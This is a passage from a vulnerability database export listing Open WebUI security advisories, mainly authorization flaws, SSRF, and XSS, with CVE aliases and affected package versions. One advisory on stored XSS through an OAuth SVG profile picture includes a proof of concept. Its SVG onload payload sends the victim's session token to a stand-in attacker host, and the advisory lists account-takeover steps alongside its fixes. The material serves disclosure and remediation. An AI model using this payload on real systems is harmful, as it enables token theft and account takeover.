| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44557, GHSA-6c2x-gcp3-gp73
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-chug-ma8r-cucc |
|
| 24 |
| url |
VCID-cw4k-3s8z-uqh8 |
| vulnerability_id |
VCID-cw4k-3s8z-uqh8 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the validate_url() function in backend/open_webui/retrieval/web/utils.py only validates the initial URL submitted by the caller. The HTTP clients used downstream (sync requests, async aiohttp, langchain's WebBaseLoader) follow HTTP 3xx redirects by default and do not re-validate the redirect target against the private-IP / metadata-IP block list. Any authenticated user can therefore submit a public URL that 302-redirects to an internal address (e.g. 127.0.0.1, 169.254.169.254, RFC1918) and read the internal response body via the /api/v1/retrieval/process/web endpoint, the /api/v1/images/... endpoints, the /api/chat/completions endpoint with an image_url content part, and any other route that calls these helpers. This vulnerability is fixed in 0.9.5. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45401, GHSA-rh5x-h6pp-cjj6
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-cw4k-3s8z-uqh8 |
|
| 25 |
| url |
VCID-dz6g-jgmg-wqce |
| vulnerability_id |
VCID-dz6g-jgmg-wqce |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, his advisory tracks a regression of the original Excel-preview XSS (CVE-2026-44549). The same root cause — XLSX.utils.sheet_to_html() output rendered via {@html excelHtml} without DOMPurify — was reintroduced sometime after v0.8.0 and is exploitable again This vulnerability is fixed in 0.9.3. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45318, GHSA-hcwp-82g6-8wxc
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-dz6g-jgmg-wqce |
|
| 26 |
| url |
VCID-dzh3-rqx4-fqhv |
| vulnerability_id |
VCID-dzh3-rqx4-fqhv |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, _validate_collection_access() checks the user-memory-* and file-* collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (/process/text, /process/file, /process/files/batch, /process/web, /process/youtube), allowing an attacker to inject content into or overwrite another user's knowledge base. This vulnerability is fixed in 0.9.5. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45398, GHSA-4g37-7p2c-38r9
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-dzh3-rqx4-fqhv |
|
| 27 |
| url |
VCID-ef1t-pxjm-j7cz |
| vulnerability_id |
VCID-ef1t-pxjm-j7cz |
| summary |
Open WebUI vulnerable to stored XSS via OAuth picture claim stored as SVG data URI in profile_image_url
# Summary
When a user signs in via OAuth, Open WebUI fetches the `picture` claim URL, infers a MIME type from the URL extension via `mimetypes.guess_type`, and stores `data:<mime>;base64,...` as the user's profile image. The OAuth code path does not go through the `validate_profile_image_url` Pydantic validator that normally restricts profile images to PNG/JPEG/GIF/WebP. A `.svg` URL in the `picture` claim lands in the database as `data:image/svg+xml;base64,...`.
The profile image endpoint `GET /api/v1/users/{id}/profile/image` returns the stored data URI with the attacker-controlled MIME type as `Content-Type` and `Content-Disposition: inline`. Security headers (CSP, `X-Content-Type-Options`) are env-gated and not set by default. An authenticated user navigating directly to that URL gets the SVG as a top-level document, executing `<script>`/`onload` in the same origin and able to read `localStorage.token` → account takeover.
Same class of trust-boundary error as CVE-2025-64496 (trust of untrusted model servers) and CVE-2025-64495 (rich-text XSS). Different sink, different code path.
# Details
## 1. MIME inferred from URL extension, not Content-Type
`backend/open_webui/utils/oauth.py:1336-1345` — `_process_picture_url`:
```python
response = await client.get(picture_url, ...)
if response.status_code == 200:
picture = response.content
base64_encoded_picture = base64.b64encode(picture).decode("utf-8")
guessed_mime_type = mimetypes.guess_type(picture_url)[0]
if guessed_mime_type is None:
guessed_mime_type = "image/jpeg"
return f"data:{guessed_mime_type};base64,{base64_encoded_picture}"
```
No MIME allowlist. The upstream `Content-Type` is ignored. For a URL ending in `.svg`, `mimetypes.guess_type` returns `image/svg+xml`.
## 2. OAuth path bypasses the profile-image validator
`backend/open_webui/utils/validate.py:10-36` defines `validate_profile_image_url`, which only accepts `/user.png`, `/user-mono.png`, and `data:image/{png,jpeg,gif,webp};base64,...`.
This validator is wired into Pydantic form models (`SignupForm`, `UpdateProfileForm`, `UserUpdateForm`), but the OAuth flow at `oauth.py:1536-1540` (existing-user login) and `oauth.py:1556-1574` (new-user signup) writes via `Users.update_user_profile_image_url_by_id` and `Auths.insert_new_auth`, both of which call SQLAlchemy directly (`models/users.py:575-588`) without going through any Pydantic model. The SVG data URI lands in the DB unchallenged.
## 3. Endpoint serves attacker-controlled MIME with `inline` disposition
`backend/open_webui/routers/users.py:504-528` — `get_user_profile_image_by_id`:
```python
header, encoded = image.split(",", 1)
media_type = header.split(";")[0].lstrip("data:") # "image/svg+xml"
data = base64.b64decode(encoded)
return StreamingResponse(
iter([data]),
media_type=media_type,
headers={"Content-Disposition": "inline"},
)
```
No MIME whitelist. The route requires `get_verified_user` — any authenticated user reaches it.
## 4. No default CSP / nosniff
`backend/open_webui/utils/security_headers.py:16-61` populates headers only when the operator sets the corresponding env var. The default deployment returns none of these. Browsers render a top-level `image/svg+xml` response as an XML document and execute embedded script.
# PoC
**Prerequisites**: operator has OAuth signup enabled (`ENABLE_OAUTH_SIGNUP=true`) or OAuth login with picture sync (`OAUTH_UPDATE_PICTURE_ON_LOGIN=true`). The attacker has a valid identity on the configured IdP and can set their profile picture URL.
1. Attacker hosts a malicious SVG at `https://attacker.example/p.svg`:
```xml
<svg xmlns="http://www.w3.org/2000/svg"
onload="fetch('https://attacker.example/x?c='+encodeURIComponent(localStorage.getItem('token')))" />
```
2. Attacker sets their IdP profile picture to that URL and signs in to Open WebUI via OAuth. Signup (or login with picture sync) stores `data:image/svg+xml;base64,...` in the attacker's `profile_image_url`.
3. Attacker shares a link to their own profile image with a victim in a chat DM or channel:
```
https://target.example/api/v1/users/<attacker-user-id>/profile/image
```
4. The authenticated victim clicks the link. The browser receives `Content-Type: image/svg+xml` with `Content-Disposition: inline`, renders the SVG as a top-level document, fires `onload`, and exfiltrates the victim's JWT. Attacker uses the JWT to take over the victim's account.
# Impact
- Account takeover of any authenticated user who opens the crafted URL.
- Post-takeover: access to the victim's chats, API keys stored in their settings, and — if the victim has `workspace.tools` permission — RCE via installed tools (per CVE-2025-64496 analysis).
- The same `_process_picture_url` function has no SSRF allowlist; a secondary primitive is to point the `picture` claim at an internal URL (metadata service, internal admin panel) and read the response bytes via the profile image endpoint.
# Suggested fix
1. In `_process_picture_url` (`utils/oauth.py:1336-1345`): reject any MIME outside `{image/png, image/jpeg, image/gif, image/webp}`. Use the upstream `Content-Type` response header, not the URL extension. Also add an SSRF allowlist or at minimum block RFC1918 / link-local / loopback targets.
2. In `get_user_profile_image_by_id` (`routers/users.py:504-528`): enforce a MIME whitelist before building `StreamingResponse`. This is the defense-in-depth layer that should have caught the bypass.
3. Apply `validate_profile_image_url` at the model/storage layer (`Users.update_user_profile_image_url_by_id`), not only at the Pydantic form layer. All write paths to the profile image column should go through the same validator.
4. Set `X-Content-Type-Options: nosniff` and a default CSP unless the operator explicitly disables them.
# References
- `backend/open_webui/utils/oauth.py:1318-1351` — MIME guess + fetch
- `backend/open_webui/utils/oauth.py:1536-1574` — OAuth write path
- `backend/open_webui/utils/validate.py:10-36` — validator (bypassed)
- `backend/open_webui/models/users.py:575-588` — DB write
- `backend/open_webui/routers/users.py:504-528` — serving endpoint
- `backend/open_webui/utils/security_headers.py:16-61` — env-gated headers
- CVE-2025-64496 — precedent: trust boundary error (same class)
- CVE-2025-64495 — precedent: rich-text XSS (same class) |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-3wgj-c2hg-vm6q
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-ef1t-pxjm-j7cz |
|
| 28 |
| url |
VCID-hj5f-yk3y-ffdg |
| vulnerability_id |
VCID-hj5f-yk3y-ffdg |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, when setting model permissions so that a group has read access to it, intending for other users to use it, those users also can read the model's system prompt. However users may consider their system prompt confidential, so this is considered a security issue. This vulnerability is fixed in 0.9.5. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45387, GHSA-h2cw-7qw9-56xr
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-hj5f-yk3y-ffdg |
|
| 29 |
| url |
VCID-jfs9-dps1-27a2 |
| vulnerability_id |
VCID-jfs9-dps1-27a2 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a user just needs to use the API endpoint: /api/chat/completions with their own API key (generated in OWUI) and the Chat ID of another user to continue the conversation of the other user. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-45349, GHSA-gfm2-xm6c-37qc
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-jfs9-dps1-27a2 |
|
| 30 |
| url |
VCID-jnsg-u9dy-r3d5 |
| vulnerability_id |
VCID-jnsg-u9dy-r3d5 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. In versions 0.6.34 and below, the functionality that inserts custom prompts into the chat window is vulnerable to DOM XSS when 'Insert Prompt as Rich Text' is enabled, since the prompt body is assigned to the DOM sink .innerHtml without sanitisation. Any user with permissions to create prompts can abuse this to plant a payload that could be triggered by other users if they run the corresponding / command to insert the prompt. This issue is fixed in version 0.6.35. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.6.35 |
| purl |
pkg:pypi/open-webui@0.6.35 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2rs8-62x1-s7h7 |
|
| 4 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 5 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 6 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 7 |
| vulnerability |
VCID-4rz6-hw32-jueb |
|
| 8 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 9 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 10 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 11 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 12 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 13 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 14 |
| vulnerability |
VCID-66zh-9jk7-9bfx |
|
| 15 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 16 |
| vulnerability |
VCID-7nbc-ng1s-suck |
|
| 17 |
| vulnerability |
VCID-8n6u-wgz9-1bgj |
|
| 18 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 19 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 20 |
| vulnerability |
VCID-94nj-qkdf-xfhn |
|
| 21 |
| vulnerability |
VCID-9jud-sr2a-8yc3 |
|
| 22 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 23 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 24 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 25 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 26 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 27 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 28 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 29 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 30 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 31 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 32 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 33 |
| vulnerability |
VCID-pwsg-72yy-quhk |
|
| 34 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 35 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 36 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 37 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 38 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 39 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 40 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 41 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 42 |
| vulnerability |
VCID-u25g-p4nx-gqd1 |
|
| 43 |
| vulnerability |
VCID-ujye-g4rj-8be5 |
|
| 44 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 45 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 46 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 47 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 48 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 49 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 50 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 51 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 52 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.35 |
|
|
| aliases |
CVE-2025-64495, GHSA-w7xj-8fx7-wfch
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-jnsg-u9dy-r3d5 |
|
| 31 |
| url |
VCID-k17g-bd9g-67f7 |
| vulnerability_id |
VCID-k17g-bd9g-67f7 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.19, authorization controls surrounding the memories API were inconsistent, resulting in the ability of a standard user to delete, restore, and view the contents of other users' memories. Using a newly created non-admin user with no existing memories, it is possible to view existing memories via POST /api/v1/memories/query. Similarly, even if a non-admin user cannot modify another user's memory data via POST /api/v1/memories/{memory_id}/update, the endpoint's response improperly leaks the content of that memory if a valid memory_id is known. The DELETE /api/v1/memories/{memory_id} can also be used by any user to delete an existing memory. Deleted memories can then be restored by calling the POST /api/v1/memories/{memory_id}/update endpoint again. This vulnerability is fixed in 0.6.19. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.6.19 |
| purl |
pkg:pypi/open-webui@0.6.19 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2rs8-62x1-s7h7 |
|
| 4 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 5 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 6 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 7 |
| vulnerability |
VCID-4rz6-hw32-jueb |
|
| 8 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 9 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 10 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 11 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 12 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 13 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 14 |
| vulnerability |
VCID-66zh-9jk7-9bfx |
|
| 15 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 16 |
| vulnerability |
VCID-7j5a-pu4k-kucf |
|
| 17 |
| vulnerability |
VCID-7nbc-ng1s-suck |
|
| 18 |
| vulnerability |
VCID-8n6u-wgz9-1bgj |
|
| 19 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 20 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 21 |
| vulnerability |
VCID-94nj-qkdf-xfhn |
|
| 22 |
| vulnerability |
VCID-9jud-sr2a-8yc3 |
|
| 23 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 24 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 25 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 26 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 27 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 28 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 29 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 30 |
| vulnerability |
VCID-jnsg-u9dy-r3d5 |
|
| 31 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 32 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 33 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 34 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 35 |
| vulnerability |
VCID-pvep-chj7-ekeg |
|
| 36 |
| vulnerability |
VCID-pwsg-72yy-quhk |
|
| 37 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 38 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 39 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 40 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 41 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 42 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 43 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 44 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 45 |
| vulnerability |
VCID-u25g-p4nx-gqd1 |
|
| 46 |
| vulnerability |
VCID-ujye-g4rj-8be5 |
|
| 47 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 48 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 49 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 50 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 51 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 52 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 53 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 54 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 55 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.19 |
|
|
| aliases |
CVE-2026-44570, GHSA-hmjq-crxp-7rjw
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-k17g-bd9g-67f7 |
|
| 32 |
| url |
VCID-k9jf-5jzd-pkge |
| vulnerability_id |
VCID-k9jf-5jzd-pkge |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, the API /api/v1/notes/{note_id} endpoint lacks proper authorization checks, allowing authenticated users to retrieve notes belonging to other users by guessing or enumerating UUIDs. This results in unauthorized disclosure of potentially sensitive or private user data. This vulnerability is fixed in 0.8.11. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.11 |
| purl |
pkg:pypi/open-webui@0.8.11 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 7 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 8 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 9 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 10 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 11 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 12 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 13 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 14 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 15 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 16 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 17 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 18 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 19 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 20 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 21 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 22 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 23 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 24 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 25 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 26 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 27 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 28 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 29 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 30 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 31 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 32 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 33 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 34 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 35 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 36 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 37 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 38 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.11 |
|
|
| aliases |
CVE-2026-45666, GHSA-x3qm-p8hr-3c3h
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-k9jf-5jzd-pkge |
|
| 33 |
| url |
VCID-mn21-kwuu-w7by |
| vulnerability_id |
VCID-mn21-kwuu-w7by |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.19, there's an IDOR in the channels message management system that allows authenticated users to modify or delete any message within channels they have read access to. The vulnerability exists in the message update and delete endpoints, which implement channel-level authorization but completely lack message ownership validation. While the frontend correctly implements ownership checks (showing edit/delete buttons only for message owners or admins), the backend APIs bypass these protections by only validating channel access permissions without verifying that the requesting user owns the target message. This creates a client-side security control bypass where attackers can directly call the APIs to modify other users' messages. This vulnerability is fixed in 0.6.19. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.6.19 |
| purl |
pkg:pypi/open-webui@0.6.19 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2rs8-62x1-s7h7 |
|
| 4 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 5 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 6 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 7 |
| vulnerability |
VCID-4rz6-hw32-jueb |
|
| 8 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 9 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 10 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 11 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 12 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 13 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 14 |
| vulnerability |
VCID-66zh-9jk7-9bfx |
|
| 15 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 16 |
| vulnerability |
VCID-7j5a-pu4k-kucf |
|
| 17 |
| vulnerability |
VCID-7nbc-ng1s-suck |
|
| 18 |
| vulnerability |
VCID-8n6u-wgz9-1bgj |
|
| 19 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 20 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 21 |
| vulnerability |
VCID-94nj-qkdf-xfhn |
|
| 22 |
| vulnerability |
VCID-9jud-sr2a-8yc3 |
|
| 23 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 24 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 25 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 26 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 27 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 28 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 29 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 30 |
| vulnerability |
VCID-jnsg-u9dy-r3d5 |
|
| 31 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 32 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 33 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 34 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 35 |
| vulnerability |
VCID-pvep-chj7-ekeg |
|
| 36 |
| vulnerability |
VCID-pwsg-72yy-quhk |
|
| 37 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 38 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 39 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 40 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 41 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 42 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 43 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 44 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 45 |
| vulnerability |
VCID-u25g-p4nx-gqd1 |
|
| 46 |
| vulnerability |
VCID-ujye-g4rj-8be5 |
|
| 47 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 48 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 49 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 50 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 51 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 52 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 53 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 54 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 55 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
